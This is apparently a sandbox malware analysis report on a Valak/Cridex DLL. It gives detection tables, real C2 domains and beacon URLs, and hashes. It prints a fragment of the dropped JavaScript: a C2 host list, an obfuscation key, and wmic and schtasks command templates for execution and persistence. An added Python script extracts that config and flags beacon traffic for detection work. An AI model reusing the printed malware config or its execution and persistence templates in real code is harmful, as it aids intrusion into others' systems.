• wscript.exe (started by rundll32.exe): knockoutlights.com; a-zcorner.com; 2 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)

Antivirus and machine-learning detection, initial sample:
Source | Detection | Scanner | Label
draw.dll | 83% | ReversingLabs | Win32.Worm.Cridex
draw.dll | 76% | Virustotal |
draw.dll | 100% | Avira | TR/Kryptik.ytszl
draw.dll | 100% | Joe Sandbox ML |

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches

Domains:
Source | Detection | Scanner | Label
knockoutlights.com | 13% | Virustotal |
a-zcorner.com | 9% | Virustotal |
organicgreensfl.com | 6% | Virustotal |

URLs:
Source | Detection | Scanner | Label
http://a-zcorner.com/ | 100% | Avira URL Cloud | malware
http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3 | 100% | Avira URL Cloud | malware
http://d0d0f3d189430.com | 100% | Avira URL Cloud | malware
http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=b2Z1Y309Q0JUTFNIVyowNjFTMDA2PUN | 0% | Avira URL Cloud | safe
http://organicgreensfl.com/ | 0% | Avira URL Cloud | safe
http://organicgreensfl.com | 0% | Avira URL Cloud | safe
http://knockoutlights.com | 100% | Avira URL Cloud | malware
http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid= | 0% | Avira URL Cloud | safe
http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3 | 100% | Avira URL Cloud | malware
http://d0d0abee1d18255e.comXN | 0% | Avira URL Cloud | safe
http://a-zcorner.com | 100% | Avira URL Cloud | malware
http://d0d0abee1d18255e.com | 100% | Avira URL Cloud | malware
http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDVU1SSVYrMTcwUjExNzxgZ2p1Yzw0MGM1YDU1NDxrZ2I0Pzw1NDwyNT81&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211&ubwG=payxcvavvogx | 100% | Avira URL Cloud | malware
http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1Pk | 100% | Avira URL Cloud | malware
http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9EWyY8Oj1fPDw6MU9OWEBfR | 100% | Avira URL Cloud | malware
http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3U1S0pcRFtAXyI4PjlbODg%2BNUtKXER | 100% | Avira URL Cloud | malware
http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=b | 100% | Avira URL Cloud | malware
http://organicgreensfl.com/he | 0% | Avira URL Cloud | safe
http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=YWh7bXMzTUxaQl1GWSQ%2BOD9dPj44M | 0% | Avira URL Cloud | safe
http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJD | 100% | Avira URL Cloud | malware
http://msnbot-207-46-194-33.search.msn.com5 | 0% | Avira URL Cloud | safe
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
knockoutlights.com | 207.148.248.143 | true | true | | unknown
ec.atdmt.com | unknown | unknown | false | | high
msnbot-207-46-194-33.search.msn.com | unknown | unknown | false | | high
organicgreensfl.com | unknown | unknown | false | | unknown
a-zcorner.com | unknown | unknown | true | | unknown

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDVU1SSVYrMTcwUjExNzxgZ2p1Yzw0MGM1YDU1NDxrZ2I0Pzw1NDwyNT81&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211&ubwG=payxcvavvogx | true | Avira URL Cloud: malware | unknown
URLs from memory and binaries (Name; Source; Malicious; Antivirus Detection; Reputation):

http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=ZG1%2Ba
    Source: wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=b2Z1Y309Q0JUTFNIVyowNjFTMDA2PUN
    Source: wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown

http://d0d0f3d189430.com
    Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr
    Malicious: false | Avira URL Cloud: malware | Reputation: unknown

http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3
    Source: wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: malware | Reputation: unknown

http://a-zcorner.com/
    Source: wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: malware | Reputation: unknown

http://ec.atdmt.com/194-33.search.msn.com/
    Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://msnbot-207-46-194-33.search.msn.com
    Source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769445270.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr
    Malicious: false | Reputation: high

http://organicgreensfl.com/
    Source: wscript.exe, 0000000C.00000002.769378758.000000000089F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown

http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=
    Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://organicgreensfl.com
    Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown

http://d0d0abee1d18255e.comXN
    Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=ZG1%2BaHY2SElfR1hDXCE7PTpYOzs9NkhJX0dY
    Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://knockoutlights.com
    Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr
    Malicious: true | Avira URL Cloud: malware | Reputation: unknown

http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3
    Source: wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: malware | Reputation: unknown

http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=
    Source: wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769499595.0000000004B31000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769524971.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown

http://a-zcorner.com
    Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr
    Malicious: true | Avira URL Cloud: malware | Reputation: unknown

http://ec.atdmt.com/
    Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://d0d0abee1d18255e.com
    Source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr
    Malicious: false | Avira URL Cloud: malware | Reputation: unknown

http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9
    Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJ
    Source: wscript.exe, 0000000C.00000002.769105699.0000000000841000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753900638.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769313214.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753950766.0000000000849000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=YGl6bHIyTE1bQ1xHWCU%2FOT5cPz85MkxNW0Nc
    Source: wscript.exe, 0000000C.00000003.753900638.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769313214.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://ec.atdmt.com/W
    Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1Pk
    Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: malware | Reputation: unknown

http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9EWyY8Oj1fPDw6MU9OWEBfR
    Source: wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: malware | Reputation: unknown

http://msnbot-207-46-194-33.search.msn.com/G
    Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=YGl6bHI
    Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3U1S0pcRFtAXyI4PjlbODg%2BNUtKXER
    Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: malware | Reputation: unknown

http://msnbot-207-46-194-33.search.msn.com/
    Source: wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false | Reputation: high

http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=b
    Source: wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: malware | Reputation: unknown

http://organicgreensfl.com/he
    Source: wscript.exe, 0000000C.00000002.769056047.000000000082B000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown

http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=YWh7bXMzTUxaQl1GWSQ%2BOD9dPj44M
    Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown

http://ec.atdmt.com
    Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr
    Malicious: false | Reputation: high

http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJD
    Source: wscript.exe, 0000000C.00000002.769378758.000000000089F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: true | Avira URL Cloud: malware | Reputation: unknown

http://msnbot-207-46-194-33.search.msn.com5
    Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown
Contacted public IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
207.148.248.143 | knockoutlights.com | United States | 29873 | BIZLAND-SDUS | true
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 756451
Start date and time: 2022-11-30 08:54:12 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 4s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: draw.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDLL@12/1@10/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .dll
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, wermgr.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, WmiApSrv.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 152.199.19.161
• Excluded domains from analysis (whitelisted): fs.microsoft.com, atlasdmt.vo.msecnd.net, az361816.vo.msecnd.net, cs9.wpc.v0cdn.net
• Execution Graph export aborted for target loaddll32.exe, PID 5220 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 6128 because there are no executed functions
• Execution Graph export aborted for target wscript.exe, PID 3680 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:57:25 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
Joe Sandbox View / Context: No context
Dropped file: C:\Users\Public\iVIwVADQD.eLxan
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 23564
Entropy (8bit): 5.438761228660278
Encrypted: false
SSDEEP: 384:dJrMlicWXPzLMW7FhSci6kzRcZsHapJrMlicWXPzLMW7FhSci6kzRcZsHar:dEijPzLpSc2RcZsHapEijPzLpSc2RcZV
MD5: AC601D9D01A57918D277C8C95CF9C27D
SHA1: AED1F0882ABCBC5B733967049530F408AA1D5AE7
SHA-256: 3A74B66A731DBA8D16495903F7E995FDA63E3EF5DF475775D739123ADD501E0D
SHA-512: A8C93D2D279550573D8E5608E2B9F0A636751B29252EF1E2AE5EAD3B288B8C79F6550719048822436D62A2FA75C83A02CE02DFA0C1274E7F4612FB79C4F6DDA9
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: C:\Users\Public\iVIwVADQD.eLxan, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery, Description: Detects JS potentially executing WMI queries, Source: C:\Users\Public\iVIwVADQD.eLxan, Author: ditekSHen
Reputation: low
Preview (start of the file as shown by the sandbox, with the CRLF line breaks it renders as ".." restored; the report truncates the preview mid-string):

    var config = {
        PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
        SOFT_SIG : 'mad29',
        SOFT_VERSION: 32,
        C2_REQUEST_SLEEP : 21,
        C2_FAIL_SLEEP : 21,
        C2_FAIL_COUNT : 20,
        C2_OB_KEY : 'JxTRG4mY',

        C2_PREFIX : 'rpc.aspx'
    }

    var SELECTED_C2 = config.PRIMARY_C2[0];

    Math.imul = function (a, b) {
        var ah = (a >>> 16) & 0xffff;
        var al = a & 0xffff;
        var bh = (b >>> 16) & 0xffff;
        var bl = b & 0xffff;
        return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
    };

    var GlobalStrings = {
        REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
        WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
        WMIC_EXEC : "wmic process call create \"%path%\"",
        TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%comma
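The dropped script's config is the most useful artifact in this report for detection work. Its PRIMARY_C2 list mixes Microsoft-operated hostnames that keep a "high" reputation in the tables above (msnbot-207-46-194-33.search.msn.com, ec.atdmt.com, az361816.vo.msecnd.net) with the actor's own domains, the beacon path /rpc.aspx?winrm=2387&view2=classic&regclid=... is sent to both kinds of host, and the sandbox whitelisted az361816.vo.msecnd.net, which is PRIMARY_C2[0] and therefore the initial SELECTED_C2, so the very first check-in never appears in the network tables. A host blocklist built from the AV verdicts would miss half of this traffic; the URI shape is the stable indicator. The following is an added example, not code from the report, from Joe Sandbox or from the sample: it pulls the config fields out of script text and classifies proxy log lines by that URI shape. The script text is a constructed reproduction of the preview above, the log lines are constructed from URLs listed in this report, and the log format (timestamp, client IP, method, URL, status) is an assumption.

```python
"""Extract the Valak C2 config from the dropped script and triage proxy log lines.
Added example; DROPPED_PREVIEW is a CONSTRUCTED copy of the report's file preview
and LOG_LINES are CONSTRUCTED from URLs the report lists (format is assumed)."""
import re
from urllib.parse import urlsplit, parse_qs

DROPPED_PREVIEW = r"""var config = {
    PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
    SOFT_SIG : 'mad29',
    SOFT_VERSION: 32,
    C2_REQUEST_SLEEP : 21,
    C2_FAIL_SLEEP : 21,
    C2_FAIL_COUNT : 20,
    C2_OB_KEY : 'JxTRG4mY',

    C2_PREFIX : 'rpc.aspx'
}

var SELECTED_C2 = config.PRIMARY_C2[0];
"""

# Constructed proxy log lines: <time> <client> <method> <url> <status>
LOG_LINES = [
    "2022-11-30T08:56:01Z 10.0.0.15 GET http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJD&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211 200",
    "2022-11-30T08:56:22Z 10.0.0.15 GET http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=ZG1%2BaHY2SElfR1hDXCE7PTpYOzs9NkhJX0dY 404",
    "2022-11-30T08:56:40Z 10.0.0.15 GET http://organicgreensfl.com/he 200",
    "2022-11-30T08:57:02Z 10.0.0.22 GET http://www.example.com/rpc.aspx?id=1 200",
]

CONFIG_RE = re.compile(r"var\s+config\s*=\s*\{(.*?)\}", re.S)
# key : ['list', ...] | 'string' | integer   (the only value shapes the config uses)
FIELD_RE = re.compile(r"(\w+)\s*:\s*(\[[^\]]*\]|'[^']*'|\d+)")


def parse_valak_config(script_text):
    """Return the `var config = {...}` object as a dict of lists, strings and ints."""
    m = CONFIG_RE.search(script_text)
    if not m:
        raise ValueError("config object not found")
    cfg = {}
    for key, raw in FIELD_RE.findall(m.group(1)):
        if raw.startswith("["):
            cfg[key] = re.findall(r"'([^']*)'", raw)
        elif raw.startswith("'"):
            cfg[key] = raw[1:-1]
        else:
            cfg[key] = int(raw)
    return cfg


def c2_hosts(cfg):
    """Hostnames of every configured C2, decoys included."""
    return {urlsplit(u).hostname.lower() for u in cfg["PRIMARY_C2"]}


def classify_url(url, cfg):
    """'valak-beacon' when the request has the sample's check-in shape
    (/<C2_PREFIX> with winrm, view2 and regclid parameters) whatever the host;
    'c2-host-only' for any other request to a configured C2 host; else 'clean'."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    query_keys = set(parse_qs(parts.query, keep_blank_values=True))
    is_beacon = (parts.path.lower().endswith("/" + cfg["C2_PREFIX"].lower())
                 and {"winrm", "view2", "regclid"} <= query_keys)
    if is_beacon:
        return "valak-beacon"
    if host in c2_hosts(cfg):
        return "c2-host-only"
    return "clean"


def scan_log(lines, cfg):
    """Return (host, verdict) for every line that carries an http(s) URL token."""
    results = []
    for line in lines:
        for token in line.split():
            if token.startswith(("http://", "https://")):
                results.append((urlsplit(token).hostname, classify_url(token, cfg)))
                break
    return results


if __name__ == "__main__":
    config = parse_valak_config(DROPPED_PREVIEW)
    print("C2 hosts:", sorted(c2_hosts(config)))
    for host, verdict in scan_log(LOG_LINES, config):
        print(f"{verdict:14s} {host}")
```

The beacon test deliberately ignores host reputation: the second constructed line goes to ec.atdmt.com, which the report rates "high", and is still flagged because the path and parameter set match. The third line shows the weaker signal a host-only rule gives (a non-beacon request to organicgreensfl.com), and the fourth shows that a bare /rpc.aspx on an unrelated host is not enough on its own.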
File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.607669812933409
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: draw.dll
File size: 311808
MD5: 78e05075e686397097de69fb0402263e
SHA1: f3e9e7f321deb1a3408053168a6a67c6cd70e114
SHA256: 3769a84dbe7ba74ad7b0b355a864483d3562888a67806082ff094a56ce73bf7e
SHA512: 746a430aaad88fa150e7709ed834834fe5d9483c2d92c4838cd26b6f4dad960480daae7dec2a66fb4023c2cbfc316f820f809a7e51a7425900b33fe425759f2b
SSDEEP: 6144:qvcrjpzLkdo1R6HNX3/jllAbTlj1/BVICh:oaCduiNnHA/Be
TLSH: 0B64CF2136E18032F25B5B389457C2715BBEBC949B78D6CB9BC003AE5B231D19B78787
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.=...n...n...n.X.n...n.X.n...n.X.n\..n.r.n...n...n...n.X.n...n.X.n...n.X.n...n.X.n...nRich...n................PE..L...[].^...
Icon Hash: 74f0e4ecccdce0e4
Entrypoint: 0x10005962
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x10000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics: (none listed)
Time Stamp: 0x5ED75D5B [Wed Jun 3 08:20:43 2020 UTC]
TLS Callbacks: (none listed)
